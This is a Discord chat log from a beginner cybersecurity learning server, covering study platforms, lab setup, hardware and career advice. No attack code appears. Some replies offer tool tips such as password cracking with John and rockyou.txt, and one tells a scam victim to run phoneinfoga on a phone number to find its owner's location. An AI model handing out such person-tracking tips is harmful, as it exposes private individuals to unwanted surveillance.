try hack me or hack the box for beginners wanting to learn pen testing

?

What role are you in within cyber if you don’t mind me asking?

Go on Amazon, I got mine for cheap a while back when I was interested in wireless Pentesting

TryHackMe first then gravitate toward hackthebox, I personally feel like hack the box isn’t as friendly

Right now I’m mostly aiming for web pentesting ^^

ok ill figure it out i made it this far im just messing around for curiosity and educational purposes

does any one know anything about pokemon vending machine’s

I’ve bought this one pretty reliable and not to bulky

ALFA NETWORK Type-C WiFi USB,... https://www.amazon.de/dp/B08SJC78FH?ref=ppx_pop_mob_ap_share

https://github.com/morrownr/USB-WiFi/blob/main/home/Recommended_Adapters_for_Kali_Linux.md

Basically - avoid realtek chipsets

That being said - "wifi hacking" has next to no real world relevance. Those videos are largely staged

thank yall so much !!! i already went out the other day and bought a netgear nighthawk axe3000 n it wasn’t compatible wasnt trying to go waste any more money if i didn’t kno what i was buying

That’s my biggest weak spot, web

There's nothing you will find there, if you already struggle to get there, seriously

You will have to elaborate your intentions for any help with darkweb

I need a partner someone to work with in here am new please

If someone is thinking of asking what Olly needs.. he elaborated in a different channel.. needs to make money

You are on the wrong server, bud

Does anyone know cool things to do with a homelab

I am thinking about making one

someone from us or asia or someone with a VPN who can help me, I'm doing OSINT and I'm stuck. :(.

host a media server on jellyfin. you can torrent your media with a vpn or rip your dvd collection

If I were to host a media server, would I have to pay for movies and is it high bandwidth

Huu

I wanna conduct some research on indirect prompt injections. Can someone help me?

you can start by looking into how indirect prompt injection works through external data sources like web pages, docs, or plugins. check out OWASP s work on LLM security and prompt injection, and try building small test setups where an LLM processes untrusted input focus on how to detect or mitigate it, like input fltering, context separation, and output validation

I'm using portswigger academy for the indirect prompt injection labs

Oki got it

Why are you asking "us"? You should be the one to tell you how high bandwidth your connection is.
Also you would have to pay for movies or not pay for them the same you do now

Alr thanks

Cool handle

Welcome to OwlSec! 👋

Hey there 😄 We’re really happy to have you with us. Hope you and your loved ones are doing great 🤗
This server is all about learning, sharing, and growing ethically in cybersecurity and hacking. If you’re here to explore, practice, or get help, check out:
#👥・new-member-guide
#👥・help-me
#💕・free-resources
#📜・certs-and-career

Programming:
Python, Ruby, Go (sololearn, codedex, freecodecamp)
JS, PHP, ASPX, SQL (portswigger)
C, C++, Assembly, Rust (pwn college)
Learn what you need, when you need it.

Networking: Try NetAcad (THM + HTB Academy also help)
OS: Windows (PowerShell) & Linux (Bash)
After basics: TryHackMe, HackTheBox, and similar platforms
Most important: Build the right mindset 🙂

E-Books to start with:
Cybersecurity-focused books:
https://security-books.notion.site/

🚫 Please remember: We strictly prohibit any unethical or harmful activities. Let’s maintain a safe, respectful, and responsible learning environment. 💛 #📜・rules

@vast phoenix Please change your PFP.

Profile picture

@vast phoenix I am not asking you again.

so ur saying i wont be able to use wifite to get my neighbors wifis passcodes lol

I need help from the red teamers/pentesters

I'm not your real mom, feel free to invest as much time and money into it, as you like

So ask a question https://dontasktoask.com/

What kind of help?

Don’t be so harsh

and what exactly do you need?

In port swigger lab Manipulating the WebSocket handshake to exploit vulnerabilities
in these lab my ip is blocked normaly by lab after it i mistakenly lost all websocket history now to move further i want websocket history to reconnect but because my history has gone and my ip is blocked i once again unable to connect to live chat what to do now pls help meNow my current situation is i lost all websocket history and my ip has block what i can do next

Hi newbie to this world confused on how to get started goal: purple team any advice? Currently just python knowledge n bash

Learn offense technique and suggest defenses 😅

Any place of recommendation?😅

No 🙂

Will certs help

I don’t know. I only have experience, no theory or certificate

Ohk that's cool I wanna experience too just confusing to not know exactly were to push wat a drag 😣 ooh well guess we learn by trying

Send a dm

Try to learn hardening first

Ohk I'll look it up

certificates just give you confidence, having a cert doesn’t mean you’re skilled or you’re gonna make money

You guys should teach me something please 🥺

Thank you for making me feel better

you’re a complete beginner?

Learn hardening

Yes

Same here complete newbie

What operating system do you use?

start with networking, for youtube go with network chuck he’s good on networking but everything else is basically just him larping, go on netacad.com and complete the beginner networking tut it will teach you everything and then review by watching network chuck, that’s how i started my cyber journey

Mainly Mac but I do run a Ubuntu VM

I don’t know much about Mac, and to be honest not even about Linux

Hello guys, I'm on my phone. I was doing some OSINT research but I get tired and went to sleep, but I can't really sleep, I'm still thinking about it, haha. Could someone please archive this site on the Wayback Machine? I don't have a VPN on my phone and can't access the site from my country.
https://www.sato-shokai.jp/parking/

mac just makes everything harder

So I should go on netacad.com

Yeah I noticed

Learn common attack paths and attack methods. Then find out how to prevent them or contain them

yup, and make sure you have a notebook and you write info in it. it will help you A LOT, and make sure you use AI it will help you a lot too.

Okay I will do so

mac only good if you do credit fraud

Thing is i don't even know understand how to reason wireshark or nmap which makes me feel dumb so something to understand that would be cool

I'll get a home PC but I'll run a full Linux OS im not really into windows

WireShark is about analyzing traffic. This isn’t ideal. The ideal is to prevent non-explicit traffic.

How to do this: on the Firewall, block connections in inbound/incoming and outbound/outgojng. Then add rules exceptions which add Internet access only for specific apps. Afterwards, limit the internet access for those specific apps to only the TCP ports 80, 443, and 53, and the UDP port 53

focus first on basics like how tcp/ip works, what ports are how requests/responses look then when you use nmap or wireshark, try to map what you see to those concepts instead of just running commands. you’ll understand over time.

Just block internet access when not required

@sour sleet @oblique brook @whole patio I’ve been on the red teaming/pentester path for almost 2 years now, 1 consistently and I don’t even plan on getting . How do you guys measure your progress? I just do ctfs as well writeups on them but I feel like I’m not really growing. Also how would you recommend breaking into the field? The odds of me getting a pentest/red teaming job right away is highly unlikely so I was aiming to just grab a help desk that has AD and networking elements or a sysadmin job as it’ll be a stepping stone to pentest/red teaming job with personal projects (I have quite a few). A ciso himself told me not to chase certs, what do you guys think as well as where are you in your journey?

I’m a defender with red teaming friends.

I have my modded version of Windows, we stress test my operating system against attack methods and notice gaps or where verification is confident.

Well a good way to measure progress is defiant to try harder ctfs
(Htb has ctfs from easy to insane)
A classical way to see your progress is actually go for a cert like
CPTS or OSCP+ if your able to pay the fee

hello guys can someone help with duqu 2.0

Wth, I never heard of modded windows

About my personal journey
I study info sec an put myself a challenge I’m planing to take the CWES in 8 months and 3 weeks

That does sound very interesting

Sounds good

Some ctfs aren’t realistic but I’ll look into those certs, I’m planning on making the transition to hackthebox as I’m hearing everyone is moving away from TryHackMe.

Oh definitely! Move to htb less hand holding and the legacy boxes even have a indicator how realistic they are

It’s Windows 10 but the binaries are customized and replaced, the apps are switched with Windows XP apps, and the appearance was modified to look like Windows XP. At the same time, there are local accounts which don’t have access to system binaries, the local accounts don’t have access to the registry, the file system has been divided between writable folders and executable folders without overlap, there are fake information to make malware self-destruct after it thinks a real hardware machine is a virtual machine, the services are disabled until only 80 of them are open, some drivers were disabled in the Device Manager, the installation of drivers is blocked by group policy and NTFS ACLs, the services taskhostw.exe and services.exe have the mitigation MicrosoftSignedOnly, the third party software are elevated to SYSTEM intentionally, and much more

@sour sleet

Also the ranked system doesn’t count all the boxes you pwnd but only the active ones so it’s a better measurement how your skills are right now ^^

You set that up yourself? That sounds advanced

I downloaded a modded Windows 10 that had the graphics and sounds replaced with Windows XP, the apps replaced to Windows XP, and most defenses disabled. Then I added my security on top of this original setup

It may sound weird but I work better when I’m under constraints

I have a documentation file for my operating system. Would you like to see it?

Sure as long as it isn’t a downloadable link loll, no offense but look at this environment 😂 why blue teaming if you don’t mind me asking, More jobs?

I started learning defense because I was curious and scared. Now I’m not scared anymore, just angry at overly-permissive defaults

I can’t send files here, I will try to send the text in your DMs if you’re ok with it

Is this that weird "gaming optimized" windows? Forgot the name

Not at all

funny how people r so schizo around links

AtlasOS was the name

I don’t click links either

That’s wassup, I was told that a defender has to be right every time what do you think?

hey would anyone mind checking out my SOC Homelab ive been working on? i really just want some feedback if possible !

Not right, successful

Is that a bad way to think?

That’s not the goal, the goal is influencing the return on investment and removing the easy paths. The rest doesn’t have priority

Sure

not really it’s just ur not gonna get hit with some browser sandbox escape and RCE zero day

at most, an ip leak, and obviously if you click on a link and it asks you to login to something then be cautious

But you could, so you better disable JIT and GPU from your browser, and use the flag RendererCodeIntegrity

yeah man lemme know if you ever find that in the wild so i can be the first to do a write up on it

I haven’t found it on the wild, but I’ll keep my strict control flow guard just in case

cuz chances are you’ll never come across something like that in your life unless you’re actively hunting for it lol

🫂

@wet gate did you know I open my browser inside a single-purpose account and restrict the token using the SAFER subsystem for the broker? 🙂

Sure, thats common knowledge that you do that

Says so right here in our DB

👀

Idk half the things you guys are saying 🥀

What would you like to learn?

no

but that’s cool cgz ig

Ofc, that’s why I joined this chat, to learn from everyone else

cgz?

Yeah, which concept would you like to learn?

I was lost from everything that was said since you was talking about your modded windows 🥀

Ok. Anything in particular you’re curious?

What was the purpose for that build, For training like some metasploitable type?

congrats

No, it’s a return on investment manipulation lab machine which serves for research and guard off hackers

I make my research there (like how mandatory integrity control interacts with user account control) and at the same time I cause enough friction and confusion to make any hacker leave

Ofc ik what 0day is but How about the “browser sandbox escape”

browsers are in a sandbox when u use them

code that is potentially executed arbitrary or remotely, needs to get out of that sandbox in order to run code on your machine

therefore browser sandbox escape

Ok cool that makes more sense

You need to understand what a browser is made of.

The component that touches the website is called the renderer, and it’s restricted by AppContainer.

The component that manages the browser (in Google’s case it’s the browser itself) itself called the broker.

Obviously, the broker has more privileges than the renderer. So a sandbox escape tries to make a code execution (JavaScript vulnerability abused by the website) take control of the broker (the browser app) to execute more privileged codes.

Let me guess, you’re on the offensive side?

Let me know if you need further information 🙂

somewhat do both

Appreciate it, sheesh, it’s really levels 🥀

It’s easy to understand. The website loads in a sandbox, and the overseer is the app. The sandbox is the renderer process, and the overseer is called broker

Yes I get that but I’m talking about generally

Ok, I’m happy to help

And I appreciate that, How long you been on your cyber journey ?

9 months

Certs?

None

Broke into the field yet or you’re trying to?

I’m just having fun

Felt you on that, I actually gravitated toward this field due to WiFi Pentesting, just to find out it’s not really in demand as every other type but I still do it just for fun

I’m not going to connect to public Wi-Fi. And I always use AdGuard DNS rather than whatever the modem uses

I also did protocol stripping and only have IPv4

It’s no way you did all of this with 9 months of knowledge

It was in the first month. The rest was refinement

So what’s your goals if you care to share? You sound like you really know your stuff

I want to keep myself secure, troll hackers, and relax

How would you know if a hacker is targeting you, firewall notis?

if he doesn’t want you to know, you won’t know

Kernel-boot logs, Firewall logs, unknown services, unknown files, mitigation logs, unexpected tasks, defenses being disabled, HVCI logs, MeasuredBoot, and more.

You will if you know MeasuredBoot

Also why the ip strip

Less attack surface

Sheesh bro wtf😂

What’s wrong?

You sound tough🔥, genuinely

It’s the basics

I don’t need IPv6 so I disable IPv6

Yea ik just overall

you sound schizo like genuinely

someone who is 9 months into cyber being like this is funny to me

anyways to each their own

Why?

Eh, I don’t know if it’s a compliment

ur acting as if the NSA are after u or something lol

You have to act like this

u really don’t like at all

I gotta agree

been in the game 10 or so years, never needed to do the amount of stuff you’ve done lmfao

Yeah i agree with resetti 100%

You’re probably less aware or something, because the more I learn the more exposed I feel

like idk who you think is gonna target you lol

less aware of what?

Risks and configuration

@oblique brook how afraid were you? There has to be an origin story, a missing piece 😂

i’m behind a firewall, as are 90% of most peoples internet, nobody is getting into my network from the internet lol

Nah, I already said I work better under constraints

and nobody has

Because a Firewall works best when your computer is in idle 🙂

“hackers” do not spend time trying to get into your router from the net, then pivot onto your machine

You have to earn this confidence, not assume it

it’s 90% malware nowadays, unless you are a business

10 years in the game btw

Bro what?

Here's a good resource for you. Might give you some background
https://www.youtube.com/watch?v=HVsIWgnMPuQ

genuine question, what risks am i exposed to?

Doesn’t mean you can start assuming without doing real policy work. You don’t know that the weakest link for vulnerabilities are convenience and compatibility?

This question is too broad

so what risks are you exposed to then?

since you seem to have sorted out everything and have it all locked down

Mostly in-memory-only remote command execution under selective kernel bugs and a non-standard configuration that deviates from approved setups

On the opposite, I make my trade-offs public

holy shit dude yeah you are a paranoid schizophrenic

you actually just said ur risk is that of 0day kernel level exploits

Because that’s the only meaningful next step

well to each their own

i honestly just find it funny

My primitives trust the kernel and the firmware, there’s no other way

I don’t?

i know you don’t because ur very serious about the risk of u being hit by some kernel level 0day made by the nso group or something lol

which again, to each their own

i just find it unnecessary and overkill

It’s just about theoretical security under practical risks. I optimize both, like a real defender should

but hey i guess when eternalblue 2.0 comes around you’ll be all good !

yh but nobody is attacking u in the first place

Bro, I’m literally the reason that red teamers don’t have to work under simple tricks

and if they are they’re doing it with malware

That’s just a practical observation

no it’s because ur not a business

or a known rich individual

And how do you know that

or most likely some politician

because you are one singular person talking to me right now

on one account

whos been into cyber for 9 months....

unless you claim you yourself and you is your business lol

this guy

Ya got me weak rn😂

which if that’s the case, fair, self employment is a thing

Doesn’t mean anything. Don’t you know about information asymmetry?

but nobody is targeting you

i don’t think u understand the goals of TAs these days

I know

I optimize for high friction, low payoff, and no trust on feedback

u yap a lot of buzz words without actually saying anything too

Are you replying striaght out of GPT ?

it’s funny

Ok we have been cluttering this help me chat for long enough lol. Lets rather just move on. What started as a normal , interesting convo is proving to be really useless. Lmao

“i optimise for high friction low payoff no trust zero day functionality with my kernel level debugger running a constant monitor of code caves and polymorphic setups of binaries using large language model training with 18 firewall confirmations to ensure that the configuration of the box is as smooth as it can be 😎”

You don’t understand my mindset 🙂

this is how u talk

i do it’s one of a schizo

anyways

i was told to stop using that word

sorry

You are right with that but we also dont want that mindset, so can we move one please?

As this channel is for helping. You can always go to dm's

@oblique brook Please read my message before hitting send

omf....essay incoming

Wall of text

@oblique brook chill😂

No, I’m saying that an attacker would have high friction (restrictive permissions, services that don’t execute, apps that don’t exist, folders are separated between writable and executable), low payoff (no credentials or logins or documents), and feedback void (denied access is met with multiple different error messages, from different primitives, and in some cases the feedback isn’t visible or can intentionally be mistaken as misconfiguration)

Ok

Resetti has mentioned in here before hes open to dm's so please take it there. This channel is reserved fo helping

Ok

and i’m saying an attacker would never target you in the first place

also, malware would bypass most of those preventions

but anyways let’s move on

Please take it to dm's gents

Loved your talk on malware btw 👍

appreciate it

Guys I need help here. I want to begin Malware Analysis and basically having an attacker machine which is Kali Linux and a Victim Machine hopefully flare Windows 11 but I’m soo worried it’s gonna seep to my actual computer even though it’s in a virtual machine with an internal network

Have you tried a bare-metal hypervisor?

No what is that?

A manager of virtual machines that doesn’t run inside an external operating system

How do I do that?

Good question, I need to learn this myself

it wont

u aint gotta worry about that

just keep disconnected from internet

and dont use shared folders or shared clipboard that type of stuff

Yo guys i need help with CTF task that requires decryption of PDF, but also the task is kinda unclear and im getting out of ideas, anyone could help?

What about have an internal network so I can have an attack machine and a victim?

bruteforce it with john

tried

yeah sure

also cant really blindly bruteforce, cuz theres so many combinations

Hmm ok but can’t zero day attacks or attacks that actual go for the hardware cause?

woudl take a day or smth

Yes but only APTs have virtual machine escapes

if its a ctf should be in rockyou.txt

Hmm ok thanks

yeah, and ur never gonna run into that in your life

Alright I just gotta watch what malware I test tbh 😭

no malware you analyse will have an active working zeroday for ur vm

Why is that?

this cyberskiller ctf shit is so trash

real

because is unbelievably rare, and you are not a threat hunter

sorry ive got no idea about them

:(

Too targeted, too specific, needs to bypass attack surface reduction, too expensive to build

Ohhh yeah tbh that makes sense

Ok today I will disable clipboard and copy and paste, no shared folders, internal network and then I’ll just test it

Thanks @oblique brook @wet gate

If you want to be paranoid, run the virtual machine inside a separate user account 🙂

Ohhh ok thanks

It doesn’t help much, just to prevent reading files from your main account

Probably will do becuase im hella paranoid my laptop has got years of important information

Are you on Windows or Linux?

I’m on Windows

Good, then you should know about NTFS permissions

Yeah but never used it

You could use NTFS. As you know, a deny entry takes precedence over an allow entry, and this is enforced by the kernel

Tbh I’ve never even touched it ever so I’m have to experiment

It’s ok, it’s easy to understand. Remember:
blank: no permission.
allow: grant permission.
deny: prevent the permission from being used.

Also, NTFS wants that you create the same group for allow, if you want fine-grained permissions that allow some things but deny some things.

I will defo be doing this once I can the more security the better

Thanks so much bro

is there anything to test my self in network+ journy like a website of quizes or whatever?

u could ask chatgpt to give you some network+ related questions, then answer them, and see how you do

also: https://www.examcompass.com/comptia/network-plus-certification/free-network-plus-practice-tests

thanks

Fun fact: android is based on linux

what about operating system is there any useful website for quizes (I prefer ask experts then AI)

any answer?

netacad, thm, htb

is freecodecamp a good place to learn python?

ye

https://www.proprofs.com/quiz-school/story.php?title=operating-system-test-1
https://quizlet.com/835210734/operating-systems-quiz-questions-flash-cards/

google exists btw

just search "operating system quiz" mane

i feel lost i need some help i dont know where to start

#👥・new-member-guide

What has you lost

Any idea about any online cloud vm hosting service that doesnt require a card/payment verification?

I'd be surprised if there are any freely available to you

Its like.. people with the same question tend to use them for nefarious reasons, somehow

ur not gonna find that

anywhere

🥲

I didnt really have much hope, but just wanted to try my luck here

u might be able to get some free azure credit or something with a promitional link

but dont expect to be able to do much on the servers themselves

you most likely wont have root access to be able to do anything

Yeah, currently I am practicing on an ubuntu distro using ditrosea, but I cant save anything, and have to install everything again everytime

I was planning to switch to kali if I could find an online vm

do you have a computer?

lol just setup your own VM with virtualbox

download ubuntu or kali image

import

done

I dont have storage to spare

And this computer has some important data as well, I am just scared that I will mess something up while setting vm

make some

you'll be fine

it wont mess up anything, although you do need enough space to install the VM

It is, for all intents and purposes, just a big file on the computer

Hello I am not sure if this is really the place to ask this. I am very new to discord. But I am wanting to us Arch on a mac mini with an M1 chip. I have seen information that says its possible but I have also seen where its not exactly compatiable. Can anyone provide some guidance. I just found out about linux a few days ago and want to try to dive in and learn as much as I can

do not put arch on a mac mini

you will break your entire computer

either setup a VM on the mac, and dont use arch, unless you are very experienced with Linux

😂

MacOS is Unix based as it is, you can learn a lot from just opening the MacOS terminal and googling for linux fundamental commands

bro i put kali on a macbook

good for u

it dont break my computer

kali is a lot safer than arch, you cant break it with one command

? did apple implement hardware level security that will short everything if something other than macOS runs? (they probably will do something like that in the next 10 years)

its not the end of the world if he did that

no

but its arch

and i would assume he is a beginner if he is brand new to discord

no beginner should touch arch, as i said, they will end up breaking their computer

just download VMWare or Virtualbox, and setup a VM, simple as that

I installed arch as a beginner and didn’t brick my computer but that’s survivorship bias, if you’re a beginner you genuinely don’t even need arch there is no point in installing it in the first place literally all I did on arch was English homework and then I went back to windows lol

100% agree on the vm it takes 10 minutes to set up

vs 12 hours with arch 😭

was it an arm based architecture

Not with THAT attitude you cant ^^

linux bare metal on arm based mac hardware is not quite supported.. there are some projects who attempt to, but nothing you really want, unless you like pain

LOL

Hello

I need help

whats better? certificates or work experince (internships)

#1482326165329809489 message

thanks boss 🫡

I need help when doing an encrypted process injection, for some reason the shellcode fails to run (it crashes the injected process). Can anyone help me debug my steps?

cant help you with that mate, what you’re asking for is literally help with exploit development techniques

nothing can be done, sorry

contact the authorities

and sit down with your auntie and explain clearly to her about these scams

Understand

Understood will do thank you

What is accounts.google.com why is it always in front of my websites that I go to?

That like an account to something tho or a site

Give a dm tho @misty badge

the official google account website

lol

Exactly

Ngl came to the conclusion of using a whole ass new laptop 🤣🤣🤣

No files nothing

It’ll be safe

How do I get a exact ip adress of a website

ping example.com

Yeah but they can still hide it

For example with cloudfare

getting the real ip isn't usually possible unless its misconfigured then

How is it not possible

How do people ddos for example

They get it somehow

usually DDOSers (larp larp larp) rely on misconfigs, leaks or old cached dns records

95% of "DDOSers" can't ddos

layer 7 attacks

or this

I don’t know how true this is but I see for example rippersec going crazy

They me ddosing a lot

ddosers are useless creatures that cant do shit

"going crazy" and its just a 1 hour attack that leaves their net dead for a week

Totally

Well it does damage especially when they do it to government websites

Not only govement but it can make damage to business aswell

no it doesnt LMFAO

and furthermore as i said, ddosers attacks dont last long at all, their net either dies and the site comes back up or it gets mitigated pretty quickly

Where would you recommend to learn hacking

https://tryhackme.com/hacktivities

everybody wanna be hacking lol

Hi

Can someone help me to get my Gmail

https://tenor.com/view/bro-is-finished-cooked-finished-dog-closing-eyes-dog-with-eyes-closed-gif-8933440936102921947

did u add a recovery email on it

No boss

Does anyone have any advice for what part of I.T. to focus on before seriously pushing to learn Cybersec?

My foundation is reasonably broad but shallow, and I'm wondering what kinds of things I need to be good at already to be good at cybersec.

What's the most important thing to have a strong foundation in before even touching cybersec? Networking?

Just contact google support.

yeah, networking is definitely the #1 foundation

after that, basic linux and windows admin skills, file systems and some scripting really help

Cool. Thanks for the answer. :)

Some have hacked my account but I use Google account to login so can someone help me to recovery

not possible, contact the support team for the account you lost

Some have hacked my efootball account but I use Google account to login so can someone help me to recovery

So i think you will need to try to "kick" the hackers out of you're google account and enable 2FA and maybe change passwords and then try to see if you can get them out of you're efootbal account

not possible, contact the support team for the account you lost

im so bad at SQLI i just bashed my head through the wall for 4 hours anyone got some good ressources to work on SQLI ive done both THM and THB basic rooms for the topic >///<

👋 hello.

I am kinda new to all of this,

I want to break into cybersecurity and networking,
I know the job field is abysmal and oversaturated, I am still want to get into this field and become a professional.

Now my definition of professional dose not mean I get a 9 to 5 job in this field, to me it mean I can do what ever I need in this field and have a relatively comfortable life after wards. To freelancing is okay or gig work is okay as long as it puts food the table.

Now, I was hopping to get the experts from here's help on how to get started, what i need, and how long it should normally take and what to do to start earning after getting the appropriate skills.

Please can anyone help me see the light end of the tunnel?

Thank you.

Anyone know an efficient way i can learn CSS and JS?

w3school and doing your own projects ^^

Noted, thanks

Check out these useful channels:
#📜・certs-and-career
#💕・free-resources
#👥・new-member-guide

Programming:

• Tools/Automation: Python, Ruby, Go (sololearn, codedex, freecodecamp, etc)
• Web exploitation: JavaScript, PHP, ASPX, SQL (portswigger)
• Binary Exploitation: C, C++, Assembly, Rust (pwn college)
  Learn any or all above langs as per requirement

Networking: netacad is good platform (THM and HTB Academy)
OSes: Windows (especially powershell), Linux (especially bash)
After covering fundamentals: Tryhackme, Hackthebox, similar platforms for hands on
Most important: Mindset with Insanity
Ebooks to read for cybersecurity:

Cybersecurity centric books:

• https://security-books.notion.site/

mabe by 乙3尺0 𖠆

Please can someone help me to create PayPal account

Just sign up on the website

How to find someone using a phone number

They scam me 1500 through zelle

Please help me

This hacking stuff is hard and ion know where to even start

Thank you

We dont do this. Ready the #📜・rules please

Maybe give it a couple more years until your basic foundation in IT has grown?

I just bought a pc off a mutual, I was trynna play val but the computer is HWID banned. Do I try to return the pc and get another one or is there a way to get around it

look the ph no. by the phoneinfoga tool it will tell you their location region country and which simcard they have

If you try to circumvent it, you run into several other issues.

for example windows no longer accepting your computer as registered to that activation or account

for this ill just have to buy another key right? if this is the biggest issues i dont mind

is it worth it tho?

I said "for example" - you are asking us to predict your mindset about dealing with future issues as of yet not realized.. entirely up to you

Omg someone pls help

Yooo

Hello guys

Can anyone help me

Getting hacking tools

🙂

But even if you help me ( every thing I do is at my own risk)

You have been here long enough to know you have to actually use your words to ask a question

install Kali

it has installation guides on its website

ah, just your good old crossposter

R u sure?

About what

You want tools, you install a tool suite

Ok

Thxxx

whether YOU are sure though, thats between you and yourself

Hi. Can i learn hacking (probably self taught) as a first year IT student?

What is y'all's advice?

yes

You can start - it is going to be a quite long journey

But also you do not "need" to start.. depending on what kind of student you are, you may have your hands full already

Hey guys, I’m having an issue with my laptop brightness. When I’m using Windows the screen brightness works perfectly, but when I boot into Kali Linux the brightness controls don’t seem to work at all.

Has anyone faced this before or knows how to fix it? Any help would be appreciated! 🙂

Depends on whether your make and model has drivers and support from the manufacturer

Not all hardware specific gadgets may work out of the box.. fingerprint sensors and calibration sensors are notorious for that.. some GPU or fan controls.. and maybe sometimes brightness controls

Funnily enough I had that recently the other way around.. linux brightness keys worked fine, but the same device did not have that function with win11

Ok dude I tried some tools and searched online and I found the amd driver is my lap doesn't support that Thanks for you reply

You are probably not the only one in this situation, and quite often some thanksless communities are working on it.

but when i used a year ago it works fine but now I am having the brightness issue

Yeah that can happen.. if a manufacturer does not support it, volunteers do.. and those implementations may break for some reason or another. Happens with commercial support, too, when stuff is end of life or they just dont care about linux

may suddenly work with a firemware update, may suddenly break with one - may work tomorrow, may work in a year

That is one of the reasons we like to suggest to check the linux support of hardware beforehand

I am fond of thinkpads, for instance - they have a long history of excellent linux support, and so some hardware functions are supported on linux, that do not work on windows anymore ^^

why are people doing like this in hardware and updates😕

Where would you recommend finding tools I normally look on places like GitHub but woried they may also contain viruses

how can I solve this error in i2p "CRIT [JettyStarter] outer.startup.RouterAppManager: Client Jetty [/home/gentoobtw/.i2p/eepsite/jetty.xml] START_FAILED "

I've tried setting up a debian vm and install i2p on there, same error

openjdk 25.0.2

I don't think it's anything related to cyber sec but this is the first server I could think of

use open source software, and ideally stick to repos and projects that have many stars, contributors, etc etc

though there is always a risk of supply chain attack, its rare

Can someone help me to flash kali Kernel on oneplus7 pro gm1913 ? I have tried many times but fail in bootloop … or recovery loop … oos10.0.2 have kimcoder Kali Kernel for oos 10 , twrp flash … but no finish result only loop or dumpcrash , sry for my English I’m German !

I want to have HID , injection … only with kali Kernel

doing what?

This isnt kali, it is nethunter.
The kali discord has a nethunter section, the kali forum has a nethunter section, and supported devices are shown on the kali website

Software changes all the time, depenencies, kernels, and if something is not actively maintained it will fall off the wagon

No but ist a kernel for nethunter for all functions, like HID-4 , wlan injection, monitor mode

Is it possible to recover and loggin to a deleted gmail account? Or in some way shape or form read the messages?

contact gmail for support, nobody here can help with that

What distro is best for vibe coding, learning on THM and overall learning?

kali linux

lightweight

and customisable

mint

what about arch or gentoo

arch u will probably break and is unnecessary for overall learning and THM

gentoo thats up to you

bars

Ehat if I install something like omarchy?

why r u so finicky on an OS lmfao

just pick one all ur doing is ibe coding and THM lol

u could do that on windows with a linux VM

Im picky

then u should do ur own research on operating systems

and pick yourself

What distro supports Visual Stusio?

because clearly nobody can pick for you

Ubuntu does

Ubuntu I don’t like

What’s your criteria for choosing a distro?

Vibe code with Claude, learn on THM(Pentester, Threat Intelligence) and learn more about Linux

its funny because his criteria matches literally every single linux distro and also windows

u can do all 3 of those things on like 90% of linux distros

What are your objections to Ubuntu?

and windows now has WSL

lol

Yeah but I want to be in Linux not just like do it from an CLI

I’ll just do gentoo

sounds good

Gentoo is a solid choice 👍🏽

And you will definitely learn about Linux if something breaks there, lol

hi ...hope u all are doing wel ....i am doing ping topic in computer networking....how deep should i study thi s topic...how much should i do it?

you dont need to go insanely deep but you should understand ping well enough to actually use it

i have done it but i donno is it enough or not

Do you know how ping works do you know to Sends ICMP Echo Request
Receives ICMP Echo Reply do you know basic commands and do you understand the RTT and TTL

@icy cedar you shold know this unless you are pursuing a networking career then you have to go depper in to it

Thats one of the things, that is easily remedied once you encounter a situation and say to yourself.. damn.. i really should know more about "ping".
Its not like you burn your "ping"-school books at some point.. you can (and will) always run into situation where you either have to refresh your memory or look documentation up

yea i know all of em

where can i get a testing website

so for now i need a helo hi with it

if you want to go deeper than you need wireshark analysis tools like: tracerouter tcpdump and know the differences between IPv4 vs IPv6 ping

We do not help with this. Read #📜・rules

a what now?

yo does someone know where to get a test website

like a false website

that no one uses

a hello hi...

alright..

goofy boy

what are you trying to do

i want to test things out

make a safe vm and you need to set up one sever and one client

but when i want to setup a vm at the end it says something about a folder

i dont know what to do there

its like the final part of setting it up

idk watch a video and follow the steps

you need 2 vm

i already have one vm

for kali

set up a server simple web server and I wolud recomend to use on a windows machine

how do i do that

setting up a server

do you know how to set one up with python

no

haaaiiii who has exp with instagram maybeee 🩷 hmu

follow networck chuck linux for buginers in one of them he shows you how to do it then you will have a better understaning

appreciate the help

no worries anytime

and dont worry its very easy to set it up with python

im new to this stuff

its okej we all start somewere its importen to learn any chance you get

imma send u a friend request

sure

go to vulnhub website, download a vulnerable machine

vulnhub also has a guide on how to set up your lab environment, and precautions to take

is it safe

is asking some random on discord reassuring?

hahaha

that was a good one

https://vulnhub.com/resources/ see if someone here deletes the link in 48h .. if not, its probably safe ^^

appreciate it

Fun fact: unix was released before windows

I'm finishing Google's cybersecurity course on Coursera. What do you guys recommend after completing it to continue improving my foundation skills?

Yeah now that i think about it

tryhackme

Should I still learn the basics or start moving on to the red team? (that's what I'm interested in)

And do I follow what's in the guide in #👥・new-member-guide ?

learn thebasics lol

sure

do a few labs too, try and make things click

re-read labs/rooms if you dont understand them after completing it

Dont be me. I tried hydra and evilwinrm without knowng what they do. Msfconsole too.

how would you describe your current skill level.. lets say .. how long have you been actively learning cybersecurity now?

oh yeah, learn basics

Lmao definitely

u wont be getting into red teaming at all until you actually have some experience as a pentester

I've been studying something related to computer science for a year now (I will continue and specialize in cybersecurity), but I started seriously studying cybersecurity about 3 months ago.

give it more time.. something in the ball park of 5-10 years perhaps

for red teaming, that is

I was saying that I wanted to focus on the offensive side of penetration testing and all that, I guess I explained myself bad.

That's why i just do mine with vms. Seeing if i can break into em, break em scripting and seeing if i can do anything..

The learning stuff i might get to that

Later

Well the important part is - you have time. Pentesting is not an entry level field.. arguably cyber security is not an entry level field.
Red teaming is something that comes within reach once you have ample work experience in both of them

And it is really not something everyone is able to reach

Oh yeah, true.. man😪 thats going take a while

focus on your immediate situation.. life has ways of making plans for us regardless

Thanks for the advice, there's still a long way to go.

https://hackyourmom.com/en/kibervijna/chastyna-3-yak-vstanovyty-kali-nethunter-na-rutovanyj-oneplus-7-pro/

No idea why you post that to me

Why u said it’s not kali it’s kali nethunter…. But I want ja kali Kernel that’s give me more permission and functions

For kali nethunter

Like hid -4 and awus driver

Look

No idea ?

https://www.kali.org/docs/nethunter/

I try this

and?

Good evening, for a long time i’ve been trying to get a less expensive ways to get Xbox Ultimate subscription . Sadly I didn’t find any 😂, so my question is simple, is there any ways to do that or not?

Hi, Can someone help me with Bloodhound? It keep saying wrong cred's when i try the default which as far as i know is neo4j for both, Also tryied admin admin...How can i check what is the creds or change them...

The default username is neo4j and the password is the DB password picked earlier

https://happycamper84.medium.com/howto-setup-bloodhound-map-ad-44c7149ba28b

tutorial

It is not kali, it is based on kali. It has separate devices, separate installations, separate support channels.

If you expect it to work "just like kali" you will be disappointed. Instead, call it was it is, nethunter

or kali nethunter, doesnt matter. Point is, it is not the same

Ok

